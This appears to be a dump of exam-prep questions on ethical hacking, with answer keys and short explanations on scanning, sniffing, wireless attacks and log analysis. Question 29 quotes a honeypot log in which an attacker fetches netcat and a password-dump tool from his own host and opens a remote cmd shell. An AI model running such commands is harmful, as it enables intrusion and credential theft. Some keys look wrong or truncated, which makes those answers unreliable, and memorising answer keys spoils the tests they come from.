NEW QUESTION 1

What is the disadvantage of an automated vulnerability assessment tool?

• A. Ineffective
• B. Slow
• C. Prone to false positives
• D. Prone to false negatives
• E. Noisy

Answer: E

Explanation:
Vulnerability assessment tools perform a good analysis of system vulnerabilities; however, they are noisy and will quickly trip IDS systems.

NEW QUESTION 2

Maintaining a secure Web server requires constant effort, resources, and vigilance from an organization. Securely administering a Web server on a daily basis is an essential aspect of Web server security.
Maintaining the security of a Web server will usually involve the following steps:
1. Configuring, protecting, and analyzing log files
2. Backing up critical information frequently
3. Maintaining a protected authoritative copy of the organization's Web content
4. Establishing and following procedures for recovering from compromise
5. Testing and applying patches in a timely manner
6. Testing security periodically.
In which step would you engage a forensic investigator?

• A. 1
• B. 2
• C. 3
• D. 4
• E. 5
• F. 6

Answer: D

NEW QUESTION 3

Which of the following is NOT a reason 802.11 WEP encryption is vulnerable?

• A. There is no mutual authentication between wireless clients and access points
• B. Automated tools like AirSnort are available to discover WEP keys
• C. The standard does not provide for centralized key management
• D. The 24 bit Initialization Vector (IV) field is too small

Answer: C

Explanation:
The lack of centralized key management in itself is not a reason that the WEP encryption is vulnerable, it is the people setting the user shared key that makes it unsecure.

NEW QUESTION 4

Which of the following is one of the key features found in a worm but not seen in a virus?

• A. The payload is very small, usually below 800 bytes.
• B. It is self replicating without need for user intervention.
• C. It does not have the ability to propagate on its own.
• D. All of them cannot be detected by virus scanners.

Answer: B

Explanation:
A worm is similar to a virus by its design, and is considered to be a sub-class of a virus. Worms spread from computer to computer, but unlike a virus, it has the capability to travel without any help from a person. A worm takes advantage of file or information transport features on your system, which allows it to travel unaided.

NEW QUESTION 5

The follows is an email header. What address is that of the true originator of the message?
Return-Path: <bgates@microsoft.com>
Received: from smtp.com (fw.emumail.com [215.52.220.122].
by raq-221-181.ev1.net (8.10.2/8.10.2. with ESMTP id h78NIn404807 for <mikeg@thesolutionfirm.com>; Sat, 9 Aug 2003 18:18:50 -0500
Received: (qmail 12685 invoked from network.; 8 Aug 2003 23:25:25 -0000
Received: from ([19.25.19.10]. by smtp.com with SMTP
Received: from unknown (HELO CHRISLAPTOP. (168.150.84.123. by localhost with SMTP; 8 Aug 2003 23:25:01 -0000
From: "Bill Gates" <bgates@microsoft.com> To: "mikeg" <mikeg@thesolutionfirm.com> Subject: We need your help!
Date: Fri, 8 Aug 2003 19:12:28 -0400
Message-ID: <51.32.123.21@CHRISLAPTOP>
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0052_01C35DE1.03202950" X-Priority: 3 (Normal.
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2627
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 Importance: Normal

• A. 19.25.19.10
• B. 51.32.123.21
• C. 168.150.84.123
• D. 215.52.220.122
• E. 8.10.2/8.10.2

Answer: C

Explanation:
Spoofing can be easily achieved by manipulating the "from" name field, however, it is much more difficult to hide the true source address. The "received from" IP address 168.150.84.123 is the true source of the

NEW QUESTION 6

Samuel is the network administrator of DataX communications Inc. He is trying to configure his firewall to block password brute force attempts on his network. He enables blocking the intruder’s IP address for a period of 24 hours time after more than three unsuccessful attempts. He is confident that this rule will secure his network hackers on the Internet.
But he still receives hundreds of thousands brute-force attempts generated from various IP addresses around the world. After some investigation he realizes that the intruders are using a proxy somewhere else on the Internet which has been scripted to enable the random usage of various proxies on each request so as not to get caught by the firewall use.
Later he adds another rule to his firewall and enables small sleep on the password attempt so that if the password is incorrect, it would take 45 seconds to return to the user to begin another attempt. Since an intruder may use multiple machines to brute force the password, he also throttles the number of connections that will be prepared to accept from a particular IP address. This action will slow the intruder’s attempts.
Samuel wants to completely block hackers brute force attempts on his network.
What are the alternatives to defending against possible brute-force password attacks on his site?

• A. Enforce a password policy and use account lockouts after three wrong logon attempts even through this might lock out legit users
• B. Enable the IDS to monitor the intrusion attempts and alert you by e-mail about the IP address of the intruder so that you can block them at the firewall manually
• C. Enforce complex password policy on your network so that passwords are more difficult to brute force
• D. You can’t completely block the intruders attempt if they constantly switch proxies

Answer: D

Explanation:
Without knowing from where the next attack will come there is no way of proactively block the attack. This is becoming a increasing problem with the growth of large bot nets using ordinary workstations and home computers in large numbers.

NEW QUESTION 7

What type of port scan is shown below?

• A. Idle Scan
• B. Windows Scan
• C. XMAS Scan
• D. SYN Stealth Scan

Answer: C

Explanation:
An Xmas port scan is variant of TCP port scan. This type of scan tries to obtain information about the state of a target port by sending a packet which has multiple TCP flags set to 1 - "lit as an Xmas tree". The flags set for Xmas scan are FIN, URG and PSH. The purpose is to confuse and bypass simple firewalls. Some stateless firewalls only check against security policy those packets which have the SYN flag set (that is, packets that initiate connection according to the standards). Since Xmas scan packets are different, they can pass through these simple systems and reach the target host.

NEW QUESTION 8

On wireless networks, a SSID is used to identify the network. Why are SSID not considered to be a good security mechanism to protect a wireless network?

• A. The SSID is only 32 bits in length
• B. The SSID is transmitted in clear text
• C. The SSID is to identify a station not a network
• D. The SSID is the same as the MAC address for all vendors

Answer: B

Explanation:
The use of SSIDs is a fairly weak form of security, because most access points broadcast the SSID, in clear text, multiple times per second within the body of each beacon frame. A hacker can easily use an 802.11 analysis tool (e.g., AirMagnet, Netstumbler, or AiroPeek) to identify the SSID.

NEW QUESTION 9

Exhibit:

You have captured some packets in Ethereal. You want to view only packets sent from 10.0.0.22. What filter will you apply?

• A. ip = 10.0.0.22
• B. ip.src == 10.0.0.22
• C. ip.equals 10.0.0.22
• D. ip.address = 10.0.0.22

Answer: B

Explanation:
ip.src tells the filter to only show packets with 10.0.0.22 as the source.

NEW QUESTION 10

What is a primary advantage a hacker gains by using encryption or programs such as Loki?

• A. It allows an easy way to gain administrator rights
• B. It is effective against Windows computers
• C. It slows down the effective response of an IDS
• D. IDS systems are unable to decrypt it
• E. Traffic will not be modified in transit

Answer: D

Explanation:
Because the traffic is encrypted, an IDS cannot understand it or evaluate the payload.

NEW QUESTION 11

Bob is a Junior Administrator at ABC Company. He is installing the RedHat Enterprise Linux on his machine. At installation time, he removed the “Use MD5”
options. What will be the hashing standard?

• A. MD2
• B. DES
• C. 3DES
• D. RSA

Answer: B

Explanation:
crypt() will return an encrypted string using the standard Unix DES-based encryption algorithm or alternative algorithms that may be available on the system. By removing the “Use MD5” option Bob forces crypt() to revert to DES encryption.

NEW QUESTION 12

Which of the following is most effective against passwords ? Select the Answer

• A. Dictionary Attack
• B. BruteForce attack
• C. Targeted Attack
• D. Manual password Attack

Answer: B

Explanation:
The most effective means of password attack is brute force, in a brute force attack the program will attempt to use every possible combination of characters. While this takes longer then a dictionary attack, which uses a text file of real words, it is always capable of breaking the password.

NEW QUESTION 13

Harold is the senior security analyst for a small state agency in New York. He has no other security professionals that work under him, so he has to do all the security- related tasks for the agency. Coming from a computer hardware background, Harold does not have a lot of experience with security methodologies and technologies, but he was the only one who applied for the position.
Harold is currently trying to run a Sniffer on the agency’s network to get an idea of what kind of traffic is being passed around but the program he is using does not seem to be capturing anything. He pours through the sniffer’s manual but can’t find anything that directly relates to his problem. Harold decides to ask the network administrator if the has any thoughts on the problem. Harold is told that the sniffer was not working because the agency’s network is a switched network, which can’t be sniffed by some programs without some tweaking.
What technique could Harold use to sniff agency’s switched network?

• A. ARP spoof the default gateway
• B. Conduct MiTM against the switch
• C. Launch smurf attack against the switch
• D. Flood switch with ICMP packets

Answer: A

Explanation:
ARP spoofing, also known as ARP poisoning, is a technique used to attack an Ethernet network which may allow an attacker to sniff data frames on a local area network (LAN) or stop the traffic altogether (known as a denial of service attack). The principle of ARP spoofing is to send fake, or 'spoofed', ARP messages to an Ethernet LAN. These frames contain false MAC addresses, confusing network devices, such as network switches. As a result frames intended for one machine can be mistakenly sent to another (allowing the packets to be sniffed) or an unreachable host (a denial of service attack).

NEW QUESTION 14

In order to attack wireless network, you put up an access point and override the signal of the real access point. And when users send authentication data, you are able to capture it. What kind of attack is this?

• A. WEP Attack
• B. Drive by hacking
• C. Rogue Access Point Attack
• D. Unauthorized Access Point Attack

Answer: C

Explanation:
A rogue access point is a wireless access point that has either been installed on a secure company network without explicit authorization from a local network management or has been created to allow a cracker to conduct a man-in-the-middle attack.

NEW QUESTION 15

You are the security administrator for a large network. You want to prevent attackers from running any sort of traceroute into your DMZ and discovering the internal structure of publicly accessible areas of the network. How can you achieve this?

• A. Block TCP at the firewall
• B. Block UDP at the firewall
• C. Block ICMP at the firewall
• D. There is no way to completely block tracerouting into this area

Answer: D

Explanation:
If you create rules that prevents attackers to perform traceroutes to your DMZ then you’ll also prevent anyone from accessing the DMZ from outside the company network and in that case it is not a DMZ you have.

NEW QUESTION 16

Which of the following best describes session key creation in SSL?

• A. It is created by the server after verifying theuser's identity
• B. It is created by the server upon connection by the client
• C. It is created by the client from the server's public key
• D. It is created by the client after verifying the server's identity

Answer: D

Explanation:
An SSL session always begins with an exchange of messages called the SSL handshake. The handshake allows the server to authenticate itself to the client using public-key techniques, then allows the client and the server to cooperate in the creation of symmetric keys used for rapid encryption, decryption, and tamper detection during the session that follows. Optionally, the handshake also allows the client to authenticate itself to the server.

NEW QUESTION 17

You are sniffing as unprotected WiFi network located in a JonDonalds Cybercafe with Ethereal to capture hotmail e-mail traffic. You see lots of people using their laptops browsing the web while snipping brewed coffee from JonDonalds. You want to sniff their email message traversing the unprotected WiFi network.
Which of the following ethereal filters will you configure to display only the packets with the hotmail messages?

• A. (http contains “hotmail”) && ( http contains “Reply-To”)
• B. (http contains “e-mail” ) && (http contains “hotmail”)
• C. (http = “login.passport.com” ) && (http contains “SMTP”)
• D. (http = “login.passport.com” ) && (http contains “POP3”)

Answer: A

Explanation:
Each Hotmail message contains the tag Reply-To:<sender address> and “xxxx-xxx-xxx.xxxx.hotmail.com” in the received tag.

NEW QUESTION 18

Which type of attack is port scanning?

• A. Web server attack
• B. Information gathering
• C. Unauthorized access
• D. Denial of service attack

Answer: B

NEW QUESTION 19

What is "Hacktivism"?

• A. Hacking for a cause
• B. Hacking ruthlessly
• C. An association which groups activists
• D. None of the above

Answer: A

Explanation:
The term was coined by author/critic Jason Logan King Sack in an article about media artist Shu Lea Cheang. Acts of hacktivism are carried out in the belief that proper use of code will have leveraged effects similar to regular activism or civil disobedience.

NEW QUESTION 20

Which of the following is the best way an attacker can passively learn about technologies used in an organization?

• A. By sending web bugs to key personnel
• B. By webcrawling the organization web site
• C. By searching regional newspapers and job databases for skill sets technology hires need to possess in the organization
• D. By performing a port scan on the organization's web site

Answer: C

Explanation:
Note: Sending web bugs, webcrawling their site and port scanning are considered "active" attacks, the question asks "passive"

NEW QUESTION 21

Peter extracts the SID list from Windows 2008 Server machine using the hacking tool "SIDExtracter". Here is the output of the SIDs:

From the above list identify the user account with System Administrator privileges?

• A. John
• B. Rebecca
• C. Sheela
• D. Shawn
• E. Somia
• F. Chang
• G. Micah

Answer: F

NEW QUESTION 22

Wayne is the senior security analyst for his company. Wayne is examining some traffic logs on a server and came across some inconsistencies. Wayne finds some IP packets from a computer purporting to be on the internal network. The packets originate from
192.168.12.35 with a TTL of 15. The server replied to this computer and received a response from 192.168.12.35 with a TTL of 21. What can Wayne infer from this traffic log?

• A. The initial traffic from 192.168.12.35 was being spoofed.
• B. The traffic from 192.168.12.25 is from a Linux computer.
• C. The TTL of 21 means that the client computer is on wireless.
• D. The client computer at 192.168.12.35 is a zombie computer.

Answer: A

NEW QUESTION 23

Where should a security tester be looking for information that could be used by an attacker against an organization? (Select all that apply)

• A. CHAT rooms
• B. WHOIS database
• C. News groups
• D. Web sites
• E. Search engines
• F. Organization’s own web site

Answer: ABCDEF

Explanation:
A Security tester should search for information everywhere that he/she can access. You never know where you find that small piece of information that could penetrate a strong defense.

NEW QUESTION 24

In order to attack a wireless network, you put up an access point and override the signal of the real access point. As users send authentication data, you are able to capture it. What kind of attack is this?

• A. WEP attack
• B. Drive by hacking
• C. Rogue access point attack
• D. Unauthorized access point attack

Answer: C

Explanation:
The definition of a Rogue access point is:1. A wireless access point (AP) installed by an employee without the consent of the IT department. Without the proper security configuration, users have exposed their company's network to the outside world.2. An access point (AP) set up by an attacker outside a facility with a wireless network. Also called an "evil twin," the rogue AP picks up beacons (signals that advertise its presence) from the company's legitimate AP and transmits identical beacons, which some client machines inside the building associate with.

NEW QUESTION 25

Exhibit:

Given the following extract from the snort log on a honeypot, what do you infer from the attack?

• A. A new port was opened
• B. A new user id was created
• C. The exploit was successful
• D. The exploit was not successful

Answer: D

Explanation:
The attacker submits a PASS to the honeypot and receives a login incorrect
before disconnecting.

NEW QUESTION 26

You work as security technician at ABC.com. While doing web application testing, you might be required to look through multiple web pages online which can take a long time. Which of the processes listed below would be a more efficient way of doing this type of validation?

• A. Use mget to download all pages locally for further inspection.
• B. Use wget to download all pages locally for further inspection.
• C. Use get* to download all pages locally for further inspection.
• D. Use get() to download all pages locally for further inspection.

Answer: B

Explanation:
Wget is a utility used for mirroring websites, get* doesn’t work, as for the actual FTP command to work there needs to be a space between get and * (ie. get *), get(); is just bogus, that’s a C function that’s written 100% wrong. mget is a command used from “within” ftp itself, ruling out A. Which leaves B use wget, which is designed for mirroring and download files, especially web pages, if used with the –R option (ie. wget –R www.ABC.com) it could mirror a site, all expect protected portions of course.
Note: GNU Wget is a free network utility to retrieve files from the World Wide Web using HTTP and FTP and can be used to make mirrors of archives and home pages thus enabling work in the background, after having logged off.

NEW QUESTION 27

You want to capture Facebook website traffic in Wireshark. What display filter should you use that shows all TCP packets that contain the word 'facebook'?

• A. display==facebook
• B. traffic.content==facebook
• C. tcp contains facebook
• D. list.display.facebook

Answer: C

NEW QUESTION 28

Attackers can potentially intercept and modify unsigned SMB packets, modify the traffic and forward it so that the server might perform undesirable actions. Alternatively, the attacker could pose as the server or client after a legitimate authentication and gain unauthorized access to data. Which of the following is NOT a means that can be used to minimize or protect against such an attack?

• A. Timestamps
• B. SMB Signing
• C. File permissions
• D. Sequence numbers monitoring

Answer: ABD

NEW QUESTION 29

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The file Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below:
“cmd1.exe /c open 213.116.251.162 >ftpcom” “cmd1.exe /c echo johna2k >>ftpcom” “cmd1.exe /c echo haxedj00 >>ftpcom” “cmd1.exe /c echo get nc.exe >>ftpcom” “cmd1.exe /c echo get samdump.dll >>ftpcom” “cmd1.exe /c echo quit >>ftpcom”
“cmd1.exe /c ftp –s:ftpcom”
“cmd1.exe /c nc –l –p 6969 e-cmd1.exe”
What can you infer from the exploit given?

• A. It is a local exploit where the attacker logs in using username johna2k.
• B. There are two attackers on the system – johna2k and haxedj00.
• C. The attack is a remote exploit and the hacker downloads three files.
• D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port.

Answer: C

NEW QUESTION 30
......